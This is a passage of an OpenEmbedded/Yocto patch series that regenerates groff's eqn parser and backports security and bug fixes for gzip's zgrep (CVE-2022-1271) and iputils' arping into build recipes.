-     break;
- 
-   case 63:
--#line 291 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 295 "src/preproc/eqn/eqn.ypp"
-     { (yyval.col) = new column((yyvsp[0].b)); }
--#line 1856 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1871 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 64:
--#line 293 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 297 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[-2].col)->append((yyvsp[0].b)); (yyval.col) = (yyvsp[-2].col); }
--#line 1862 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1877 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 65:
--#line 298 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 302 "src/preproc/eqn/eqn.ypp"
-     { (yyval.col) = (yyvsp[-1].col); }
--#line 1868 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1883 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 66:
--#line 300 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 304 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[-1].col)->set_space((yyvsp[-3].n)); (yyval.col) = (yyvsp[-1].col); }
--#line 1874 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1889 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 67:
--#line 305 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 309 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[0].col)->set_alignment(CENTER_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1880 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1895 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 68:
--#line 307 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 311 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[0].col)->set_alignment(LEFT_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1886 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1901 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 69:
--#line 309 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 313 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[0].col)->set_alignment(RIGHT_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1892 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1907 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 70:
--#line 311 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 315 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[0].col)->set_alignment(CENTER_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1898 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1913 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 71:
--#line 315 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 319 "src/preproc/eqn/eqn.ypp"
-     { (yyval.str) = (yyvsp[0].str); }
--#line 1904 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1919 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 72:
--#line 317 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 321 "src/preproc/eqn/eqn.ypp"
-     { (yyval.str) = (yyvsp[0].str); }
--#line 1910 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1925 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 73:
--#line 322 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 326 "src/preproc/eqn/eqn.ypp"
-     { (yyval.str) = (yyvsp[0].str); }
--#line 1916 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1931 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 74:
--#line 324 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 328 "src/preproc/eqn/eqn.ypp"
-     { (yyval.str) = strsave("{"); }
--#line 1922 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1937 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 75:
--#line 326 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 330 "src/preproc/eqn/eqn.ypp"
-     { (yyval.str) = strsave("}"); }
--#line 1928 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1943 "src/preproc/eqn/eqn.cpp"
-     break;
- 
- 
--#line 1932 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1947 "src/preproc/eqn/eqn.cpp"
-+
-       default: break;
-     }
-   /* User semantic actions sometimes alter yychar, and that requires
-@@ -2042,12 +2058,10 @@ yyerrlab:
- | yyerrorlab -- error raised explicitly by YYERROR.  |
- `---------------------------------------------------*/
- yyerrorlab:
--
--  /* Pacify compilers like GCC when the user code never invokes
--     YYERROR and the label yyerrorlab therefore never appears in user
--     code.  */
--  if (/*CONSTCOND*/ 0)
--     goto yyerrorlab;
-+  /* Pacify compilers when the user code never invokes YYERROR and the
-+     label yyerrorlab therefore never appears in user code.  */
-+  if (0)
-+    YYERROR;
- 
-   /* Do not reclaim the symbols of the rule whose action triggered
-      this YYERROR.  */
-@@ -2109,6 +2123,7 @@ yyacceptlab:
-   yyresult = 0;
-   goto yyreturn;
- 
-+
- /*-----------------------------------.
- | yyabortlab -- YYABORT comes here.  |
- `-----------------------------------*/
-@@ -2116,6 +2131,7 @@ yyabortlab:
-   yyresult = 1;
-   goto yyreturn;
- 
-+
- #if !defined yyoverflow || YYERROR_VERBOSE
- /*-------------------------------------------------.
- | yyexhaustedlab -- memory exhaustion comes here.  |
-@@ -2126,6 +2142,10 @@ yyexhaustedlab:
-   /* Fall through.  */
- #endif
- 
-+
-+/*-----------------------------------------------------.
-+| yyreturn -- parsing is finished, return the result.  |
-+`-----------------------------------------------------*/
- yyreturn:
-   if (yychar != YYEMPTY)
-     {
-@@ -2155,5 +2175,5 @@ yyreturn:
- #endif
-   return yyresult;
- }
--#line 329 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1903  */
-+#line 333 "src/preproc/eqn/eqn.ypp"
- 
-diff --git a/src/preproc/eqn/eqn.hpp b/src/preproc/eqn/eqn.hpp
-index 32a32a5..9a092c1 100644
---- a/src/preproc/eqn/eqn.hpp
-+++ b/src/preproc/eqn/eqn.hpp
-@@ -1,8 +1,9 @@
--/* A Bison parser, made by GNU Bison 3.2.  */
-+/* A Bison parser, made by GNU Bison 3.4.1.  */
- 
- /* Bison interface for Yacc-like parsers in C
- 
--   Copyright (C) 1984, 1989-1990, 2000-2015, 2018 Free Software Foundation, Inc.
-+   Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2019 Free Software Foundation,
-+   Inc.
- 
-    This program is free software: you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-@@ -170,10 +171,9 @@ extern int yydebug;
- 
- /* Value type.  */
- #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
--
- union YYSTYPE
- {
--#line 30 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1906  */
-+#line 34 "src/preproc/eqn/eqn.ypp"
- 
- 	char *str;
- 	box *b;
-@@ -182,9 +182,9 @@ union YYSTYPE
- 	int n;
- 	column *col;
- 
--#line 186 "src/preproc/eqn/eqn.hpp" /* yacc.c:1906  */
--};
-+#line 186 "src/preproc/eqn/eqn.hpp"
- 
-+};
- typedef union YYSTYPE YYSTYPE;
- # define YYSTYPE_IS_TRIVIAL 1
- # define YYSTYPE_IS_DECLARED 1
 diff --git a/src/preproc/eqn/eqn.ypp b/src/preproc/eqn/eqn.ypp
 index fb318c3..b7b647e 100644
 --- a/src/preproc/eqn/eqn.ypp
diff --git a/meta/recipes-extended/groff/groff_1.22.4.bb b/meta/recipes-extended/groff/groff_1.22.4.bb
index e398478349..f0e9eb6a8a 100644
--- a/meta/recipes-extended/groff/groff_1.22.4.bb
+++ b/meta/recipes-extended/groff/groff_1.22.4.bb
@@ -18,6 +18,9 @@ SRC_URI = "${GNU_MIRROR}/groff/groff-${PV}.tar.gz \
 SRC_URI[md5sum] = "08fb04335e2f5e73f23ea4c3adbf0c5f"
 SRC_URI[sha256sum] = "e78e7b4cb7dec310849004fa88847c44701e8d133b5d4c13057d876c1bad0293"
 
+# Remove at the next upgrade
+PR = "r1"
+
 DEPENDS = "bison-native"
 RDEPENDS_${PN} += "perl sed"
 
@@ -28,7 +31,14 @@ MULTILIB_SCRIPTS = "${PN}:${bindir}/gpinyin ${PN}:${bindir}/groffer ${PN}:${bind
 EXTRA_OECONF = "--without-x --without-doc"
 PARALLEL_MAKE = ""
 
-CACHED_CONFIGUREVARS += "ac_cv_path_PERL='/usr/bin/env perl' ac_cv_path_BASH_PROG='no'"
+CACHED_CONFIGUREVARS += "ac_cv_path_PERL='/usr/bin/env perl' ac_cv_path_BASH_PROG='no' PAGE=A4"
+
+# Delete these generated files since we depend on bison-native
+# and regenerate them. Do it deterministically (always).
+do_configure_prepend() {
+	rm -f ${S}/src/preproc/eqn/eqn.cpp
+	rm -f ${S}/src/preproc/eqn/eqn.hpp
+}
 
 do_install_append() {
 	# Some distros have both /bin/perl and /usr/bin/perl, but we set perl location
@@ -52,6 +62,10 @@ do_install_append() {
 	rm -rf ${D}${bindir}/glilypond
 	rm -rf ${D}${libdir}/groff/glilypond
 	rm -rf ${D}${mandir}/man1/glilypond*
+
+	# not ship /usr/bin/grap2graph and its releated man files
+	rm -rf ${D}${bindir}/grap2graph
+	rm -rf ${D}${mandir}/man1/grap2graph*
 }
 
 do_install_append_class-native() {
diff --git a/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
new file mode 100644
index 0000000000..046c95df47
--- /dev/null
+++ b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
@@ -0,0 +1,45 @@
+From 7073a366ee71639a1902eefb7500e14acb920f64 Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Mon, 4 Apr 2022 23:52:49 -0700
+Subject: [PATCH] zgrep: avoid exploit via multi-newline file names
+
+* zgrep.in: The issue with the old code is that with multiple
+newlines, the N-command will read the second line of input,
+then the s-commands will be skipped because it's not the end
+of the file yet, then a new sed cycle starts and the pattern
+space is printed and emptied. So only the last line or two get
+escaped. This patch makes sed read all lines into the pattern
+space and then do the escaping.
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740df61e575e8c3148b7bd3c147a81ea00c7c]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+ zgrep.in | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/zgrep.in b/zgrep.in
+index 3efdb52..d391291 100644
+--- a/zgrep.in
++++ b/zgrep.in
+@@ -222,9 +222,13 @@ do
+ '* | *'&'* | *'\'* | *'|'*)
+         i=$(printf '%s\n' "$i" |
+             sed '
+-              $!N
+-              $s/[&\|]/\\&/g
+-              $s/\n/\\n/g
++              :start
++              $!{
++                N
++                b start
++              }
++              s/[&\|]/\\&/g
++              s/\n/\\n/g
+             ');;
+       esac
+       sed_script="s|^|$i:|"
diff --git a/meta/recipes-extended/gzip/gzip_1.10.bb b/meta/recipes-extended/gzip/gzip_1.10.bb
index 9778e687e1..c558c21f10 100644
--- a/meta/recipes-extended/gzip/gzip_1.10.bb
+++ b/meta/recipes-extended/gzip/gzip_1.10.bb
@@ -4,6 +4,7 @@ LICENSE = "GPLv3+"
 
 SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \
            file://run-ptest \
+           file://CVE-2022-1271.patch \
           "
 SRC_URI_append_class-target = " file://wrong-path-fix.patch"
 
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
new file mode 100644
index 0000000000..bf86115843
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
@@ -0,0 +1,79 @@
+From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001
+From: lac-0073 <61903197+lac-0073@users.noreply.github.com>
+Date: Mon, 26 Oct 2020 09:45:42 +0800
+Subject: [PATCH] arpping: make update neighbours work again
+
+The arping is using inconsistent sender_ip_addr and target_ip_addr in
+messages.  This causes the client receiving the arp message not to update
+the arp table entries.
+
+The specific performance is as follows:
+
+There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the
+same IP subnet as eth0.  This IP was originally used on another machine 1,
+and th IP needs to be changed back to the machine 1.  When using the arping
+command to announce what ethernet address has IP 10.20.30.3, the arp table
+on machine 3 is not updated.
+
+Machine 3 original arp table:
+
+    10.20.30.3  machine 2 eth0:0    00:00:00:00:00:02
+    10.20.30.2  machine 2 eth0      00:00:00:00:00:02
+    10.20.30.1  machine 1 eth0      00:00:00:00:00:01
+
+Create interface eth0:0 on machine 1, and use the arping command to send arp
+packets.  Expected outcome on machine 3:
+
+    10.20.30.3  machine 1 eth0:0    00:00:00:00:00:01
+    10.20.30.2  machine 2 eth0      00:00:00:00:00:02
+    10.20.30.1  machine 1 eth0      00:00:00:00:00:01
+
+Actual results on machine 3:
+
+    10.20.30.3  machine 2 eth0:0    00:00:00:00:00:02
+    10.20.30.2  machine 2 eth0      00:00:00:00:00:02
+    10.20.30.1  machine 1 eth0      00:00:00:00:00:01
+
+Fixes: https://github.com/iputils/iputils/issues/298
+Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339
+Signed-off-by: Aichun Li <liaichun@huawei.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098]
+Signed-off-by: Visa Hankala <visa@hankala.org>
+---
+ arping.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index a002786..53fdbb4 100644
+--- a/arping.c
++++ b/arping.c
+@@ -968,7 +968,7 @@ int main(int argc, char **argv)
+ 		}
+ 		memset(&saddr, 0, sizeof(saddr));
+ 		saddr.sin_family = AF_INET;
+-		if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
++		if (ctl.source || ctl.gsrc.s_addr) {
+ 			saddr.sin_addr = ctl.gsrc;
+ 			if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+ 				error(2, errno, "bind");
+@@ -979,12 +979,14 @@ int main(int argc, char **argv)
+ 			saddr.sin_port = htons(1025);
+ 			saddr.sin_addr = ctl.gdst;
+ 
+-			if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
+-				error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
+-			if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+-				error(2, errno, "connect");
+-			if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
+-				error(2, errno, "getsockname");
++			if (!ctl.unsolicited) {
++				if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
++					error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
++				if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
++					error(2, errno, "connect");
++				if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
++					error(2, errno, "getsockname");
++			}
+ 			ctl.gsrc = saddr.sin_addr;
+ 		}
+ 		close(probe_fd);
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
new file mode 100644
index 0000000000..8495178879
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
@@ -0,0 +1,39 @@
+From 18f14be80466ddc8fb17a400be82764a779c8dcd Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 31 Jul 2019 21:28:12 +0100
+Subject: [PATCH] arping: revert partially - fix sent vs received packages
+ return value
+
+Commit 84ca65ca980315c73f929fed8b6f16bbd698c3a0 caused regression.  The
+arping -D needs return value evaluation that was the earlier default, in
+other cases the new return value should be correct.
+
+Addresses: https://github.com/iputils/iputils/issues/209
+See-also: https://github.com/void-linux/void-packages/issues/13304
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/18f14be80466ddc8fb17a400be82764a779c8dcd]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 77c9c56..2c87c15 100644
+--- a/arping.c
++++ b/arping.c
+@@ -792,7 +792,11 @@ static int event_loop(struct run_state *ctl)
+ 	close(tfd);
+ 	freeifaddrs(ctl->ifa0);
+ 	rc |= finish(ctl);
+-	rc |= (ctl->sent != ctl->received);
++	if (ctl->dad && ctl->quit_on_reply)
++		/* Duplicate address detection mode return value */
++		rc |= !(ctl->brd_sent != ctl->received);
++	else
++		rc |= (ctl->sent != ctl->received);
+ 	return rc;
+ }
+ 
+-- 
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
new file mode 100644
index 0000000000..a5f40860dc
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
@@ -0,0 +1,39 @@
+From 1df5350bdc952b14901fde356b17b78c2bcd4cff Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 28 Aug 2019 20:05:22 +0100
+Subject: [PATCH] arping: fix -f quit on first reply regression
+
+When arping runs together with -f 'quit on first reply' and -w <timeout>
+'how long to wait for a reply' the command needs to exit if replies are not
+received after wait period.  Notice that the exit in case of lost packages
+will be 1 signifying failure.  Getting a reply results to 0 exit value.
+
+Addresses: https://bugs.debian.org/935946
+Reported-by: Lucas Nussbaum <lucas@debian.org>
+Addresses: https://github.com/iputils/iputils/issues/211
+Reported-by: Noah Meyerhans <noahm@debian.org>
+Broken-since: 67e070d08dcbec990e1178360f82b3e2ca4f6d5f
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/1df5350bdc952b14901fde356b17b78c2bcd4cff]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2c87c15..30884f6 100644
+--- a/arping.c
++++ b/arping.c
+@@ -764,7 +764,8 @@ static int event_loop(struct run_state *ctl)
+ 					continue;
+ 				}
+ 				total_expires += exp;
+-				if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
++				if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
++				    (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+ 					exit_loop = 1;
+ 					continue;
+ 				}
+-- 
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
new file mode 100644
index 0000000000..ebd122c157
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
@@ -0,0 +1,37 @@
+From ec821e572a640bd79aecc3922cb9001f4b6b26f2 Mon Sep 17 00:00:00 2001
+From: Petr Vorel <petr.vorel@gmail.com>
+Date: Sat, 7 Sep 2019 06:07:19 +0200
+Subject: [PATCH] arping: Fix comparison of different signedness warning
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+../arping.c:768:45: warning: comparison of integer expressions of different signedness: ‘int’ and ‘uint64_t’ {aka ‘long unsigned int’} [-Wsign-compare]
+  768 |         (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+
+Fixes: 1df5350 ("arping: fix -f quit on first reply regression")
+Reference: https://github.com/iputils/iputils/pull/212
+Acked-by: Sami Kerola <kerolasa@iki.fi>
+Signed-off-by: Petr Vorel <petr.vorel@gmail.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/ec821e572a640bd79aecc3922cb9001f4b6b26f2]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2d05728..88319cd 100644
+--- a/arping.c
++++ b/arping.c
+@@ -765,7 +765,7 @@ static int event_loop(struct run_state *ctl)
+ 				}
+ 				total_expires += exp;
+ 				if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+-				    (ctl->quit_on_reply && ctl->timeout < total_expires)) {
++				    (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
+ 					exit_loop = 1;
+ 					continue;
+ 				}
+-- 
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
new file mode 100644
index 0000000000..923e06e30b
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
@@ -0,0 +1,45 @@
+From 68f12fc4a0dbef4ae4c404da24040d22c5a14339 Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 8 Feb 2020 14:12:18 +0000
+Subject: [PATCH] arping: return success when unsolicited ARP mode destination
+ does not answer
+
+Manual page is making promise answers are not expected when -U (or -A)
+option is in use.  Either I am looking wrong or this has been broken since
+at the beginning of git history.
+
+Addresses: https://github.com/iputils/iputils/issues/247
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/68f12fc4a0dbef4ae4c404da24040d22c5a14339]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 996cf2b..5180ae0 100644
+--- a/arping.c
++++ b/arping.c
+@@ -794,7 +794,9 @@ static int event_loop(struct run_state *ctl)
+ 	close(tfd);
+ 	freeifaddrs(ctl->ifa0);
+ 	rc |= finish(ctl);
+-	if (ctl->dad && ctl->quit_on_reply)
++	if (ctl->unsolicited)
++		/* nothing */;
++	else if (ctl->dad && ctl->quit_on_reply)
+ 		/* Duplicate address detection mode return value */
+ 		rc |= !(ctl->brd_sent != ctl->received);
+ 	else
+@@ -943,7 +945,7 @@ int main(int argc, char **argv)
+ 		}
+ 		memset(&saddr, 0, sizeof(saddr));
+ 		saddr.sin_family = AF_INET;
+-		if (ctl.source || ctl.gsrc.s_addr) {
++		if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
+ 			saddr.sin_addr = ctl.gsrc;
+ 			if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+ 				error(2, errno, "bind");
+-- 
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
new file mode 100644
index 0000000000..3b8a8244da
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
@@ -0,0 +1,94 @@
+From 60a27c76174c0ae23bdafde2bad4fdd18a44a7ea Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 7 Mar 2020 22:03:21 +0000
+Subject: [PATCH] arping: use additional timerfd to control when timeout
+ happens
+
+Trying to determine timeout by adding up interval values is pointlessly
+complicating.  With separate timer everything just works.
+
+Addresses: https://github.com/iputils/iputils/issues/259
+Fixes: 1df5350bdc952b14901fde356b17b78c2bcd4cff
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/e594ca52afde89746b7d79c875fe9d6aea1850ac]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 29 ++++++++++++++++++++++++++---
+ 1 file changed, 26 insertions(+), 3 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 61db3a6..7284351 100644
+--- a/arping.c
++++ b/arping.c
+@@ -670,6 +670,7 @@ static int event_loop(struct run_state *ctl)
+ 	enum {
+ 		POLLFD_SIGNAL = 0,
+ 		POLLFD_TIMER,
++		POLLFD_TIMEOUT,
+ 		POLLFD_SOCKET,
+ 		POLLFD_COUNT
+ 	};
+@@ -686,6 +687,13 @@ static int event_loop(struct run_state *ctl)
+ 		.it_value.tv_sec = ctl->interval,
+ 		.it_value.tv_nsec = 0
+ 	};
++	int timeoutfd;
++	struct itimerspec timeoutfd_vals = {
++		.it_interval.tv_sec = ctl->timeout,
++		.it_interval.tv_nsec = 0,
++		.it_value.tv_sec = ctl->timeout,
++		.it_value.tv_nsec = 0
++	};
+ 	uint64_t exp, total_expires = 1;
+ 
+ 	unsigned char packet[4096];
+@@ -709,7 +717,7 @@ static int event_loop(struct run_state *ctl)
+ 	pfds[POLLFD_SIGNAL].fd = sfd;
+ 	pfds[POLLFD_SIGNAL].events = POLLIN | POLLERR | POLLHUP;
+ 
+-	/* timerfd */
++	/* interval timerfd */
+ 	tfd = timerfd_create(CLOCK_MONOTONIC, 0);
+ 	if (tfd == -1) {
+ 		error(0, errno, "timerfd_create failed");
+@@ -722,6 +730,19 @@ static int event_loop(struct run_state *ctl)
+ 	pfds[POLLFD_TIMER].fd = tfd;
+ 	pfds[POLLFD_TIMER].events = POLLIN | POLLERR | POLLHUP;
+ 
++	/* timeout timerfd */
++	timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0);
++	if (tfd == -1) {
++		error(0, errno, "timerfd_create failed");
++		return 1;
++	}
++	if (timerfd_settime(timeoutfd, 0, &timeoutfd_vals, NULL)) {
++		error(0, errno, "timerfd_settime failed");
++		return 1;
++	}
++	pfds[POLLFD_TIMEOUT].fd = timeoutfd;
++	pfds[POLLFD_TIMEOUT].events = POLLIN | POLLERR | POLLHUP;
++
+ 	/* socket */
+ 	pfds[POLLFD_SOCKET].fd = ctl->socketfd;
+ 	pfds[POLLFD_SOCKET].events = POLLIN | POLLERR | POLLHUP;
+@@ -764,13 +785,15 @@ static int event_loop(struct run_state *ctl)
+ 					continue;
+ 				}
+ 				total_expires += exp;
+-				if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+-				    (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
++				if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
+ 					exit_loop = 1;
+ 					continue;
+ 				}
+ 				send_pack(ctl);
+ 				break;
++			case POLLFD_TIMEOUT:
++				exit_loop = 1;
++				break;
+ 			case POLLFD_SOCKET:
+ 				if ((s =
+ 				     recvfrom(ctl->socketfd, packet, sizeof(packet), 0,
+-- 
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils_s20190709.bb b/meta/recipes-extended/iputils/iputils_s20190709.bb
index 545f3d5e87..a715d0a37b 100644
--- a/meta/recipes-extended/iputils/iputils_s20190709.bb
+++ b/meta/recipes-extended/iputils/iputils_s20190709.bb
@@ -10,11 +10,17 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390"
 
 DEPENDS = "gnutls"
 
-SRC_URI = "git://github.com/iputils/iputils \
+SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \
            file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \
            file://0001-ninfod-fix-systemd-Documentation-url-error.patch \
            file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \
            file://0001-iputils-Initialize-libgcrypt.patch \
+           file://0001-arping-revert-partially-fix-sent-vs-received-package.patch \
+           file://0002-arping-fix-f-quit-on-first-reply-regression.patch \
+           file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \
+           file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \
+           file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \
+           file://0001-arping-make-update-neighbours-work-again.patch \
            "
 SRCREV = "13e00847176aa23683d68fce1d17ffb523510946"
 
diff --git a/meta/recipes-extended/less/less/CVE-2022-48624.patch b/meta/recipes-extended/less/less/CVE-2022-48624.patch
new file mode 100644
index 0000000000..409730bd4f
--- /dev/null
+++ b/meta/recipes-extended/less/less/CVE-2022-48624.patch
@@ -0,0 +1,41 @@
